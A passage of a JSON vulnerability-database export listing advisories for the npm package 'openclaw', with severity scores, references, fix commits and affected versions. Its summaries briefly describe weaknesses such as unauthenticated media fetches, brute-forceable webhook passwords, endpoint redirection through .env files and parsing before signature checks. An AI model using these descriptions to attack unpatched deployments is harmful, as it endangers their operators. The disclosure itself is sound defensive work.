"resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31" } ], "aliases": [ "CVE-2026-41394", "GHSA-mhgq-xpfq-6r66" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "7.9", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-4hz5-f2pw-3yb4" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90990?format=api", "vulnerability_id": "VCID-4jwj-6s5z-wbeq", "summary": "OpenClaw: Zalo channel downloads media before sender authorization\n## Summary\n\nThe Zalo image path fetched and stored inbound media before the DM/pairing authorization checks ran.\n\n## Impact\n\nUnauthorized senders could force network fetches and disk writes in the inbound media store even when the message itself was rejected.\n\n## Affected Component\n\n`extensions/zalo/src/monitor.ts`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `68ceaf7a5f` (`zalo: gate image downloads before DM auth`).\n\nOpenClaw thanks @AntAISecurityLab for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33576", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.04589", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.04575", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.0499", "published_at": "2026-06-07T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33576" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/68ceaf7a5f64a23e78b95eff055e4b497218312a", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L" }, { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-02T15:11:13Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/68ceaf7a5f64a23e78b95eff055e4b497218312a" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-v2v2-f783-358j", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L" }, { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-02T15:11:13Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-v2v2-f783-358j" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33576", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33576" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-unauthorized-media-download-via-zalo-channel", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L" }, { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-02T15:11:13Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-unauthorized-media-download-via-zalo-channel" }, { "reference_url": "https://github.com/advisories/GHSA-v2v2-f783-358j", "reference_id": "GHSA-v2v2-f783-358j", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-v2v2-f783-358j" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api", "purl": "pkg:npm/openclaw@2026.3.28", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28" } ], "aliases": [ "CVE-2026-33576", "GHSA-v2v2-f783-358j" ], "risk_score": 4.4, "exploitability": "0.5", "weighted_severity": "8.8", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-4jwj-6s5z-wbeq" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91654?format=api", "vulnerability_id": "VCID-4nwq-14y4-xkhp", "summary": "OpenClaw: BlueBubbles Webhook Missing Rate Limiting Enables Brute-Force Password Guessing\n## Summary\n\nBlueBubbles Webhook Missing Guess Rate Limiting Enables Brute-Force Guessing of Weak Webhook Password\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Affected versions: `<= 2026.3.24`\n- First patched version: `2026.3.25`\n- Latest published npm version at verification time: `2026.3.24`\n\n## Details\n\nBlueBubbles webhook auth previously rejected wrong passwords without throttling repeated guesses, allowing brute-force attempts against weak webhook passwords. Commit `5e08ce36d522a1c96df2bfe88e39303ae2643d92` adds repeated-guess throttling before auth failure responses.\n\nVerified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `5e08ce36d522a1c96df2bfe88e39303ae2643d92`.\n\n## Fix Commit(s)\n\n- `5e08ce36d522a1c96df2bfe88e39303ae2643d92`", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35623", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00108", "scoring_system": "epss", "scoring_elements": "0.28542", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00108", "scoring_system": "epss", "scoring_elements": "0.28579", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00108", "scoring_system": "epss", "scoring_elements": "0.2862", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35623" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/5e08ce36d522a1c96df2bfe88e39303ae2643d92", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T15:52:54Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/5e08ce36d522a1c96df2bfe88e39303ae2643d92" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-xq8g-hgh6-87hv", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T15:52:54Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-xq8g-hgh6-87hv" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35623", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35623" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-brute-force-attack-via-missing-webhook-password-rate-limiting", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T15:52:54Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-brute-force-attack-via-missing-webhook-password-rate-limiting" }, { "reference_url": "https://github.com/advisories/GHSA-xq8g-hgh6-87hv", "reference_id": "GHSA-xq8g-hgh6-87hv", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-xq8g-hgh6-87hv" } ], "fixed_packages": [], "aliases": [ "CVE-2026-35623", "GHSA-xq8g-hgh6-87hv" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-4nwq-14y4-xkhp" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/92152?format=api", "vulnerability_id": "VCID-4u3z-rs45-gbhe", "summary": "OpenClaw: Workspace dotenv files cannot override connector endpoint hosts\n## Summary\nWorkspace dotenv files cannot override connector endpoint hosts.\n\n## Affected Packages / Versions\n- Package: openclaw (npm)\n- Affected versions: <= 2026.4.21\n- Fixed version: 2026.4.22\n\n## Impact\nA workspace .env file could set connector endpoint variables for Matrix, Mattermost, IRC, or Synology-related connectors and redirect runtime traffic away from the operator-configured endpoint.\n\n## Fix\nWorkspace .env loading now blocks those endpoint variables, including per-account Matrix homeserver suffixes and generic base-url/API-host style overrides. Trusted global runtime dotenv loading remains separate.\n\n## Fix Commit(s)\n- 0623079e98abf7202591f1b04a89755eb7ec9272\n\n## Verification\n- The fix commit is contained in the public v2026.4.22 tag.\n- openclaw@2026.4.22 is published on npm and the compiled package contains the fix.\n- Focused regression coverage for this path passed before publication.\n\nOpenClaw thanks @qi-scape for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-45003", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00011", "scoring_system": "epss", "scoring_elements": "0.01337", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00011", "scoring_system": "epss", "scoring_elements": "0.01342", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00011", "scoring_system": "epss", "scoring_elements": "0.01341", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-45003" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/0623079e98abf7202591f1b04a89755eb7ec9272", "reference_id": "", "reference_type": "", "scores": [ { "value": "5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N" }, { "value": "4.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T17:25:02Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/0623079e98abf7202591f1b04a89755eb7ec9272" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-55cf-xx38-4p9p", "reference_id": "", "reference_type": "", "scores": [ { "value": "5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "4.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T17:25:02Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-55cf-xx38-4p9p" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45003", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45003" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-connector-endpoint-host-override-via-workspace-dotenv-files", "reference_id": "", "reference_type": "", "scores": [ { "value": "5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N" }, { "value": "4.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T17:25:02Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-connector-endpoint-host-override-via-workspace-dotenv-files" }, { "reference_url": "https://github.com/advisories/GHSA-55cf-xx38-4p9p", "reference_id": "GHSA-55cf-xx38-4p9p", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-55cf-xx38-4p9p" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/114466?format=api", "purl": "pkg:npm/openclaw@2026.4.22", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.22" } ], "aliases": [ "CVE-2026-45003", "GHSA-55cf-xx38-4p9p" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-4u3z-rs45-gbhe" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91107?format=api", "vulnerability_id": "VCID-4uqc-3h1c-4yhs", "summary": "OpenClaw: Feishu webhook reads and parses unauthenticated request bodies before signature validation\n## Summary\n\nFeishu webhook reads and parses unauthenticated request bodies before signature validation\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Affected versions: `<= 2026.3.24`\n- First patched version: `2026.3.25`\n- Latest published npm version at verification time: `2026.3.24`\n\n## Details\n\nFeishu webhook handling previously parsed JSON before signature validation, which let unauthenticated callers force full JSON parsing work before rejection. Commit `5e8cb22176e9235e224be0bc530699261eb60e53` reads the raw request body, validates the signature first, and only then parses JSON.\n\nVerified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `5e8cb22176e9235e224be0bc530699261eb60e53`.\n\n## Fix Commit(s)\n\n- `5e8cb22176e9235e224be0bc530699261eb60e53`", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35640", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00127", "scoring_system": "epss", "scoring_elements": "0.31558", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00127", "scoring_system": "epss", "scoring_elements": "0.31486", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00127", "scoring_system": "epss", "scoring_elements": "0.31523", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35640" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/5e8cb22176e9235e224be0bc530699261eb60e53", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": 